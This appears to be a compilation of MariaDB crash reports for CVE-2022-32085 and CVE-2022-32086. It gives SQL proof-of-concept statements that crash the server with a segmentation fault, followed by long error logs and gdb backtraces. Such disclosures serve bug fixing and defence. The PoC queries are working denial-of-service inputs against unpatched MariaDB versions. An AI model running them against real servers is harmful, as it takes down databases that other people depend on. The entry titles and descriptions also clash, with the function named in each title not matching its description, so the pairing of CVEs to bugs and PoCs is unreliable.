sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f989b307c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55bb57c35747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55bb56bfd120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f989acf1870\]

sql/item\_cmpfunc.h:2556(Item\_func\_in::cleanup())\[0x55bb561f90ee\]

sql/item.cc:574(Item::cleanup\_processor(void\*))\[0x55bb56c4adbc\]

sql/item.h:5439(Item\_func\_or\_sum::walk(bool (Item::\*)(void\*), bool, void\*))\[0x55bb561fb774\]

sql/table.cc:3616(fix\_session\_vcol\_expr(THD\*, Virtual\_column\_info\*))\[0x55bb567afd3a\]

sql/sql\_base.cc:5433(TABLE::fix\_vcol\_exprs(THD\*))\[0x55bb5632124f\]

sql/sql\_base.cc:5467(lock\_tables(THD\*, TABLE\_LIST\*, unsigned int, unsigned int))\[0x55bb56321f93\]

sql/sql\_base.cc:5261(open\_and\_lock\_tables(THD\*, DDL\_options\_st const&, TABLE\_LIST\*, bool, unsigned int, Prelocking\_strategy\*))\[0x55bb56326800\]

sql/sql\_base.h:397(open\_and\_lock\_tables(THD\*, TABLE\_LIST\*, bool, unsigned int))\[0x55bb563dcef4\]

sql/sql\_parse.cc:4565(mysql\_execute\_command(THD\*, bool))\[0x55bb56495bb8\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55bb564a25a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55bb564a860c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55bb564ad73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55bb56868e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55bb5686933d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55bb572f9c2c\]

pthread\_create.c:0(start\_thread)\[0x7f989ace7259\]

:0(\_\_GI\_\_\_clone)\[0x7f989a8925e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 VALUES ( REPEAT ( ( NULL + 84551986.000000 ) = 74599462.000000 , ( HEX ( 18069096.000000 ) ) / -1 = 28 ) )

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/9

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

\[New LWP 321844\]

\[New LWP 272301\]

\[New LWP 315980\]

\[New LWP 272464\]

\[New LWP 272465\]

\[New LWP 272438\]

\[New LWP 313382\]

\[New LWP 313342\]

\[New LWP 315981\]

\[New LWP 315984\]

\[New LWP 315982\]

\[New LWP 321828\]

\[New LWP 331506\]

\[New LWP 331509\]

\[New LWP 272143\]

\[New LWP 315983\]

\[Thread debugging using libthread\_db enabled\]

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10009 --datadir=/home/fuboat/mariadb-tmp/9'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0x00007f989acee808 in pthread\_kill () from /usr/lib/libpthread.so.0

\[Current thread is 1 (Thread 0x7f987ba5c240 (LWP 321844))\]

(gdb) (gdb) #0  0x00007f989acee808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055bb56bfd06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x000055bb561f90ee in Item\_func\_in::cleanup (this=0x6190000a3dd8) at /experiment/mariadb-server/sql/item\_cmpfunc.h:2556

#4  0x000055bb56c4adbc in Item::cleanup\_processor (arg=<optimized out>, this=<optimized out>) at /experiment/mariadb-server/sql/item.cc:572

#5  Item::cleanup\_processor (this=<optimized out>, arg=<optimized out>) at /experiment/mariadb-server/sql/item.cc:569

#6  0x000055bb561fb774 in Item\_func\_or\_sum::walk (this=0x6190000a3dd8, processor=<optimized out>, walk\_subquery=<optimized out>, arg=0x0) at /experiment/mariadb-server/sql/item.h:5439

#7  0x000055bb567afd3a in fix\_session\_vcol\_expr (vcol=0x6190000a3f58, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/table.cc:3614

#8  fix\_session\_vcol\_expr (thd=0x62b0000bd218, vcol=0x6190000a3f58) at /experiment/mariadb-server/sql/table.cc:3608

#9  0x000055bb5632124f in TABLE::fix\_vcol\_exprs (thd=0x62b0000bd218, this=0x6190000a3298) at /experiment/mariadb-server/sql/sql\_base.cc:5434

#10 TABLE::fix\_vcol\_exprs (this=0x6190000a3298, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5426

#11 0x000055bb56321f93 in fix\_all\_session\_vcol\_exprs (tables=0x629000087408, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5465

#12 lock\_tables (thd=thd@entry=0x62b0000bd218, tables=0x629000087408, count=<optimized out>, flags=flags@entry=0) at /experiment/mariadb-server/sql/sql\_base.cc:5649

#13 0x000055bb56326800 in open\_and\_lock\_tables (thd=thd@entry=0x62b0000bd218, options=..., tables=<optimized out>, tables@entry=0x629000087408, derived=derived@entry=true, flags=flags@entry=0, prelocking\_strategy=prelocking\_strategy@entry=0x7f987ba592d0) at /experiment/mariadb-server/sql/sql\_base.cc:5261

#14 0x000055bb563dcef4 in open\_and\_lock\_tables (flags=0, derived=true, tables=0x629000087408, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.h:509

#15 mysql\_insert (thd=thd@entry=0x62b0000bd218, table\_list=0x629000087408, fields=..., values\_list=..., update\_fields=..., update\_values=..., duplic=<optimized out>, ignore=<optimized out>, result=<optimized out>) at /experiment/mariadb-server/sql/sql\_insert.cc:757

#16 0x000055bb56495bb8 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4565

#17 0x000055bb564a25a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#18 0x000055bb564a860c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#19 0x000055bb564ad73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#20 0x000055bb56868e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#21 0x000055bb5686933d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#22 0x000055bb572f9c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#23 0x00007f989ace7259 in start\_thread () from /usr/lib/libpthread.so.0

#24 0x00007f989a8925e3 in clone () from /usr/lib/libc.so.6

(gdb) quit

CVE-2022-32085: [MDEV-26407] Server crashes in Item_func_in::cleanup/Item::cleanup_processor

MariaDB v10.4 to v10.8 was discovered to contain a segmentation fault via the component Item_field::fix_outer_field.

PoC:

CREATE TABLE v0 ( v1 BIGINT ( 67 ) NOT NULL ) ;

 CREATE TABLE v2 ( v4 INT , v3 INT NOT NULL UNIQUE KEY CHECK ( -128 | ( str\_to\_date ( CHAR ( 33 ) , 'x' ) ) ) ) ;

 DROP FUNCTION IF EXISTS v0 ;

 INSERT INTO v0 SELECT DISTINCT \* FROM v0 FULL JOIN v2 ON ( SELECT v0 . v1 ) ;

Crash Log:

Version: '10.7.0-MariaDB'  socket: '/tmp/18.socket'  port: 10018  Source distribution

210816 15:33:24 \[ERROR\] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f722a3fd850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f7249ca9c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55c05f113747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55c05e0db120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f7249693870\]

sql/item.cc:5561(Item\_field::fix\_outer\_field(THD\*, Field\*\*, Item\*\*))\[0x55c05e168491\]

sql/item.cc:5982(Item\_field::fix\_fields(THD\*, Item\*\*))\[0x55c05e16b34c\]

sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55c05d80a2ed\]

sql/sql\_select.cc:1397(JOIN::prepare(TABLE\_LIST\*, Item\*, unsigned int, st\_order\*, bool, st\_order\*, Item\*, st\_order\*, st\_select\_lex\*, st\_select\_lex\_unit\*))\[0x55c05dac647c\]

sql/item\_subselect.cc:3903(subselect\_single\_select\_engine::prepare(THD\*))\[0x55c05e3cf4f6\]

sql/item\_subselect.cc:295(Item\_subselect::fix\_fields(THD\*, Item\*\*))\[0x55c05e3ccd05\]

sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55c05d810338\]

sql/sql\_base.cc:8454(setup\_conds(THD\*, TABLE\_LIST\*, List<TABLE\_LIST>&, Item\*\*))\[0x55c05d810d40\]

sql/sql\_select.cc:833(JOIN::prepare(TABLE\_LIST\*, Item\*, unsigned int, st\_order\*, bool, st\_order\*, Item\*, st\_order\*, st\_select\_lex\*, st\_select\_lex\_unit\*))\[0x55c05dac6748\]

sql/sql\_select.cc:4967(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x55c05db0dcaa\]

sql/sql\_select.cc:545(handle\_select(THD\*, LEX\*, select\_result\*, unsigned long))\[0x55c05db0e655\]

sql/sql\_parse.cc:4718(mysql\_execute\_command(THD\*, bool))\[0x55c05d97d9c1\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55c05d9805a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55c05d98660c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55c05d98b73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55c05dd46e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55c05dd4733d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55c05e7d7c2c\]

pthread\_create.c:0(start\_thread)\[0x7f7249689259\]

:0(\_\_GI\_\_\_clone)\[0x7f72492345e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 SELECT DISTINCT \* FROM v0 FULL JOIN v2 ON ( SELECT v0 . v1 )

Connection ID (thread ID): 4

Status: NOT\_KILLED

CVE-2022-32086: [MDEV-26412] Server crash in Item_field::fix_outer_field for INSERT SELECT

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort.

CREATE TABLE v0 ( v1 TINYINT NULL ) ;

 TRUNCATE TABLE v0 ;

 SELECT instr ( COALESCE ( sqrt ( ( quote ( 'x' / 46 ) ) + 0 ) , 'x' ) , 51 ) ;

 SAVEPOINT v0 ;

 SELECT 16 / 'x' AS v2 UNION SELECT -2147483648 AS v3 ORDER BY ( LAST\_VALUE ( 'x' ) OVER ( ) ) LIMIT 6 ;

 REPLACE INTO v0 VALUES ( TRUE ) ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 15:01:54 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 15:01:54 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 15:01:54 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 15:01:54 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 15:01:54 0 \[Note\] InnoDB: Using liburing

2021-08-16 15:01:54 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 15:01:54 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 15:02:07 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 15:02:07 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 15:02:07 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 15:02:07 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 15:02:07 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 15:02:07 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/4/ib\_buffer\_pool

2021-08-16 15:02:07 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 15:02:07 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 15:02:07 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 15:02:08 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 15:02:08

2021-08-16 15:02:09 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/4.socket'  port: 10004  Source distribution

210816 15:02:10 \[ERROR\] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f625c527850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f627bdd3c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55cd04b35747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55cd03afd120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f627b7bd870\]

sql/sql\_analyze\_stmt.h:89(Exec\_time\_tracker::get\_loops() const)\[0x55cd03af5195\]

sql/sql\_select.cc:24388(create\_sort\_index(THD\*, JOIN\*, st\_join\_table\*, Filesort\*))\[0x55cd034dc699\]

sql/sql\_window.cc:3007(Window\_funcs\_sort::exec(JOIN\*, bool))\[0x55cd03935d79\]

sql/sql\_window.cc:3140(Window\_funcs\_computation::exec(JOIN\*, bool))\[0x55cd03938435\]

sql/sql\_select.cc:29457(AGGR\_OP::end\_send())\[0x55cd0350fc76\]

sql/sql\_select.cc:20766(sub\_select\_postjoin\_aggr(JOIN\*, st\_join\_table\*, bool))\[0x55cd035105d0\]

sql/sql\_select.cc:20604(JOIN::exec\_inner())\[0x55cd0353482c\]

sql/sql\_select.cc:4514(JOIN::exec())\[0x55cd03536593\]

sql/sql\_select.cc:4993(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x55cd0352eb5b\]

sql/sql\_union.cc:2360(st\_select\_lex\_unit::exec())\[0x55cd0365117f\]

sql/sql\_union.cc:43(mysql\_union(THD\*, LEX\*, select\_result\*, st\_select\_lex\_unit\*, unsigned long))\[0x55cd0365d7b8\]

sql/sql\_class.h:4325(THD::is\_error() const)\[0x55cd035303a0\]

sql/sql\_parse.cc:6256(execute\_sqlcom\_select(THD\*, TABLE\_LIST\*))\[0x55cd03373d7d\]

sql/sql\_parse.cc:3946(mysql\_execute\_command(THD\*, bool))\[0x55cd0339d421\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55cd033a25a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55cd033a860c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55cd033ad73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55cd03768e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55cd0376933d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55cd041f9c2c\]

pthread\_create.c:0(start\_thread)\[0x7f627b7b3259\]

:0(\_\_GI\_\_\_clone)\[0x7f627b35e5e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): SELECT 16 / 'x' AS v2 UNION SELECT -2147483648 AS v3 ORDER BY ( LAST\_VALUE ( 'x' ) OVER ( ) ) LIMIT 6

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/4

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us      

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

\[New LWP 639727\]

\[New LWP 586228\]

\[New LWP 629512\]

\[New LWP 630498\]

\[New LWP 586314\]

\[New LWP 643180\]

\[New LWP 629544\]

\[New LWP 586347\]

\[New LWP 586033\]

\[New LWP 630466\]

\[New LWP 630472\]

\[New LWP 630499\]

\[New LWP 630529\]

\[New LWP 639688\]

\[New LWP 586318\]

\[Thread debugging using libthread\_db enabled\]

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10004 --datadir=/home/fuboat/mariadb-tmp/4'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  0x00007f627b7ba808 in pthread\_kill () from /usr/lib/libpthread.so.0

\[Current thread is 1 (Thread 0x7f625c528240 (LWP 639727))\]

(gdb) (gdb) #0  0x00007f627b7ba808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055cd03afd06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x000055cd03af5195 in Exec\_time\_tracker::get\_loops (this=0x0) at /experiment/mariadb-server/sql/sql\_analyze\_stmt.h:89

#4  Filesort\_tracker::report\_use (r\_limit\_arg=18446744073709551615, thd=0x62b0000bd218, this=0x0) at /experiment/mariadb-server/sql/sql\_analyze\_stmt.h:235

#5  filesort (thd=<optimized out>, table=table@entry=0x61f00000fcb8, filesort=filesort@entry=0x629000092dd8, tracker=<optimized out>, join=join@entry=0x62900008a768, first\_table\_bit=<optimized out>) at /experiment/mariadb-server/sql/filesort.cc:267

#6  0x000055cd034dc699 in create\_sort\_index (thd=thd@entry=0x62b0000bd218, join=join@entry=0x62900008a768, tab=tab@entry=0x629000092068, fsort=0x629000092dd8) at /experiment/mariadb-server/sql/sql\_select.cc:24386

#7  0x000055cd03935d79 in Window\_funcs\_sort::exec (this=0x629000092bf0, join=join@entry=0x62900008a768, keep\_filesort\_result=keep\_filesort\_result@entry=false) at /experiment/mariadb-server/sql/sql\_window.cc:3007

#8  0x000055cd03938435 in Window\_funcs\_computation::exec (this=<optimized out>, join=join@entry=0x62900008a768, keep\_last\_filesort\_result=keep\_last\_filesort\_result@entry=false) at /experiment/mariadb-server/sql/sql\_window.cc:3140

#9  0x000055cd0350fc76 in AGGR\_OP::end\_send (this=0x62900008b1f0) at /experiment/mariadb-server/sql/sql\_select.cc:29457

#10 0x000055cd035105d0 in sub\_select\_postjoin\_aggr (join=0x62900008a768, join\_tab=0x629000092068, end\_of\_records=<optimized out>) at /experiment/mariadb-server/sql/sql\_select.cc:20765

#11 0x000055cd0353482c in do\_select (procedure=0x0, join=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:20604

#12 JOIN::exec\_inner (this=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:4735

#13 0x000055cd03536593 in JOIN::exec (this=this@entry=0x62900008a768) at /experiment/mariadb-server/sql/sql\_select.cc:4513

#14 0x000055cd0352eb5b in mysql\_select (thd=0x62b0000bd218, tables=tables@entry=0x62b0000c1408, fields=..., conds=conds@entry=0x0, og\_num=1, order=0x629000088f68, group=0x0, having=0x0, proc\_param=0x0, select\_options=<optimized out>, result=0x6290000890a8, unit=0x62b0000c13c0, select\_lex=0x629000088788)

    at /experiment/mariadb-server/sql/sql\_select.cc:4991

#15 0x000055cd0365117f in st\_select\_lex\_unit::exec (this=0x62b0000c13c0) at /experiment/mariadb-server/sql/sql\_union.cc:2360

#16 0x000055cd0365d7b8 in mysql\_union (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890a8, unit=unit@entry=0x62b0000c13c0, setup\_tables\_done\_option=<optimized out>) at /experiment/mariadb-server/sql/sql\_union.cc:42

#17 0x000055cd035303a0 in handle\_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890a8, setup\_tables\_done\_option=setup\_tables\_done\_option@entry=0) at /experiment/mariadb-server/sql/sql\_select.cc:535

#18 0x000055cd03373d7d in execute\_sqlcom\_select (thd=0x62b0000bd218, all\_tables=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:6256

